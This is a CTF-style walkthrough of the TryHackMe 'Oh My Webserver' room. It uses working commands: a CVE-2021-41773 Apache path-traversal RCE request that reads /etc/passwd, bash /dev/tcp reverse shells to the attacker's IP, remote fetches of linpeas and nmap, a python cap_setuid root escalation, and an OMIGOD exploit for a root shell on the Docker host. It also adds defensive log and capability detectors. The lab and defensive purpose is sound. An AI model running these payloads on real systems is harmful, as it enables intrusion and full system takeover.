Oh My Webserver (CVE-2021-41773, Capabilities, Docker, CVE-2021-38647)
First, we need to scan using rustscan.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ohmyweb
╰─➤ rustscan -a 10.10.80.91 -- -A | tee rust.log 130 ↵
[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.80.91:22
Open 10.10.80.91:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-03 19:33 +0630
Nmap scan report for 10.10.80.91
Host is up, received syn-ack (0.24s latency).
Scanned at 2022-04-03 19:33:45 +0630 for 17s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.49 ((Unix))
|_http-favicon: Unknown favicon MD5: 02FD5D10B62C7BC5AD03F8B0F105323C
| http-methods:
| Supported Methods: HEAD GET POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
|_http-title: Consult - Business Consultancy Agency Template | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.46 seconds
SSH and HTTP are open. Let's enumerate the HTTP port first. Whatever we click, the site only returns the index page, so we run gobuster to brute-force directories.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ohmyweb
╰─➤ gobuster -u http://10.10.80.91/ -w /usr/share/wordlists/directory-list-2.3-medium.txt -x .php,.txt,.html
The directory scan takes too long, so instead we search for an exploit for this Apache version (2.4.49). That version is affected by the path traversal and RCE bug CVE-2021-41773, and there is a ready-made exploit at https://www.exploit-db.com/exploits/50383. The request below traverses out of /cgi-bin/ with `.%2e` segments (which 2.4.49 fails to normalise) to reach /bin/bash and run the POST body as a script.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ohmyweb
╰─➤ curl -v 'http://10.10.80.91/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"
* Trying 10.10.80.91:80...
* TCP_NODELAY set
* Connected to 10.10.80.91 (10.10.80.91) port 80 (#0)
> POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1
> Host: 10.10.80.91
> User-Agent: curl/7.68.0
> Accept: */*
> Content-Type: text/plain
> Content-Length: 52
>
* upload completely sent off: 52 out of 52 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 03 Apr 2022 13:16:34 GMT
< Server: Apache/2.4.49 (Unix)
< Transfer-Encoding: chunked
< Content-Type: text/plain
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
* Connection #0 to host 10.10.80.91 left intact
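On the defending side, this request pattern stands out in Apache access logs. The following detector is an added example, not part of the original write-up: it percent-decodes each request path, flags requests whose decoded path contains a `..` segment, and marks those that escape /cgi-bin/ to a shell as RCE attempts. The log lines are constructed, with the first mirroring the curl request above.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Apache common/combined log prefix, up to the response status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample lines (not from the write-up's target); the first mirrors the curl request above
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2022:13:16:34 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1" 200 1234
10.0.0.6 - - [03/Apr/2022:13:17:01 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1876
10.0.0.7 - - [03/Apr/2022:13:18:12 +0000] "GET /index.html HTTP/1.1" 200 5123
10.0.0.8 - - [03/Apr/2022:13:19:00 +0000] "GET /icons/%252e%252e/%252e%252e/etc/hosts HTTP/1.1" 404 196
"""

def decode_path(target: str) -> str:
    """Drop the query string and percent-decode twice so that the '.%2e' form
    Apache 2.4.49 failed to normalise, and double-encoded '%252e', both become '..'."""
    return unquote(unquote(target.split("?", 1)[0]))

def classify(target: str) -> Optional[str]:
    """Reason string if the decoded path contains a '..' segment, else None."""
    if ".." not in decode_path(target).split("/"):
        return None
    if ".." in target.split("/"):
        return "plain traversal"
    return "percent-encoded traversal (CVE-2021-41773 pattern)"

def find_traversal(log_text: str) -> list:
    """Return one finding per access-log request that walks above its directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify(m.group("target"))
        if reason is None:
            continue
        decoded = decode_path(m.group("target"))
        # Escaping /cgi-bin/ to a shell is the mod_cgi RCE variant, not just a file read
        rce = decoded.startswith("/cgi-bin/") and decoded.rsplit("/", 1)[-1] in ("sh", "bash")
        hits.append({"ip": m.group("ip"), "method": m.group("method"), "target": m.group("target"),
                     "status": int(m.group("status")), "reason": reason, "rce_attempt": rce})
    return hits
```

A 200 on a flagged request means the traversal succeeded; a patched server rejects such paths, so those entries are the ones to triage first.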
Let's get a reverse shell back to our attacking machine.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ohmyweb
╰─➤ curl -v 'http://10.10.80.91/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/10.9.2.121/9001 0>&1' -H "Content-Type: text/plain"
In the netcat listener we get a reverse shell.

We are inside a Docker container as the daemon user. We can list the filesystem root, but /root itself is denied.
daemon@4a70924bafa0:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@4a70924bafa0:/bin$ cd /root
cd /root
bash: cd: /root: Permission denied
Let's run linpeas.sh (served from our machine) to enumerate weak system configuration.
daemon@4a70924bafa0:/bin$ curl http://10.9.2.121/linpeas.sh | sh
linpeas reports an exploitable file capability: /usr/bin/python3.7 is allowed to call setuid, which the next step relies on.

Exploit this capability to become root inside the container:
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh");'
After exploiting this capability, go to /root and read the user flag.
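As an added example (not from the original write-up), here is a small audit of the kind linpeas performs: it parses `getcap -r` output, flags file capabilities that hand out root-equivalent power, and rates any capability on an interpreter as critical, because anyone who can run the interpreter inherits it. The getcap sample is constructed to mirror the python3.7 finding on this box.

```python
import re

# Capabilities that on their own let a process reach root-equivalent power
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module",
             "cap_chown", "cap_fowner", "cap_setfcap"}
# Programs that run caller-supplied code: a capability on them is usable by every local user
INTERPRETERS = re.compile(r"/(python|perl|ruby|node|php|bash|sh|gdb|vim)[\d.]*$")
# Constructed getcap -r output mirroring the finding on this box, in both libcap formats
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/perl cap_net_bind_service=ep
"""

def parse_caps(caps: str) -> dict:
    """Map capability name -> flag letters (e, i, p) from cap text such as 'cap_net_admin,cap_net_raw=eip'."""
    result = {}
    for clause in caps.split():
        m = re.match(r"^([a-z0-9_,]+)((?:[=+\-][eip]*)+)$", clause)
        if not m:
            continue
        ops = re.findall(r"([=+\-])([eip]*)", m.group(2))
        for name in m.group(1).split(","):
            flags = set(result.get(name, ()))  # later clauses build on earlier ones
            for op, letters in ops:
                if op == "=": flags = set(letters)
                elif op == "+": flags |= set(letters)
                else: flags -= set(letters)
            result[name] = flags
    return result

def audit(getcap_output: str) -> list:
    """One finding per file whose capabilities are dangerous or sit on an interpreter."""
    findings = []
    for line in getcap_output.splitlines():
        line = line.strip()
        if not line:
            continue
        # libcap < 2.41 prints 'path = caps'; newer versions print 'path caps'
        path, caps = line.split(" = ", 1) if " = " in line else line.rsplit(" ", 1)
        granted = parse_caps(caps)
        risky = sorted(c for c, f in granted.items() if c in DANGEROUS and f & {"e", "p"})
        interp = bool(INTERPRETERS.search(path))
        if risky or (interp and granted):
            severity = "critical" if risky and interp else "high" if risky else "medium"
            findings.append({"path": path, "caps": risky or sorted(granted),
                             "interpreter": interp, "severity": severity})
    return findings
```

On a real system feed it the output of `getcap -r / 2>/dev/null`; the fix is `setcap -r` on the interpreter, or building the image without that capability in the first place.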

Our container IP is 172.17.0.2 on the default Docker bridge, so the Docker host will be the gateway, 172.17.0.1.
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 100129 bytes 12304775 (11.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 87214 bytes 25039785 (23.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Next we scan the host IP from inside the container. A bash one-liner port scan (and similar tricks) did not work well here, so we download a static nmap binary from https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64 and serve it from our machine.
curl http://10.9.2.121/nmap -o nmap
./nmap 172.17.0.1 -p- --min-rate 1000
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2022-04-03 14:12 UTC
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-172-17-0-1.eu-west-1.compute.internal (172.17.0.1)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.00047s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5985/tcp closed unknown
5986/tcp open unknown
MAC Address: 02:42:FD:EB:08:F1 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 132.02 seconds
Ports 5985 and 5986 are the WinRM (WS-Management) ports; on a Linux host they belong to Microsoft's OMI agent, which is affected by OMIGOD (CVE-2021-38647). The write-up is at https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure/ and exploit code is at https://github.com/AlteredSecurity/CVE-2021-38647.
curl http://10.9.2.121/exploit.py -o exploit.py
python3 exploit.py -t 172.17.0.1 -p 5986 -c id
Here is the output of running id through the exploit.

Let's get a reverse shell on the host.
python3 exploit.py -t 172.17.0.1 -p 5986 -c "bash -c 'bash -i >& /dev/tcp/10.9.2.121/9002 0>&1'"
In the netcat listener we get a reverse shell as root on the host.
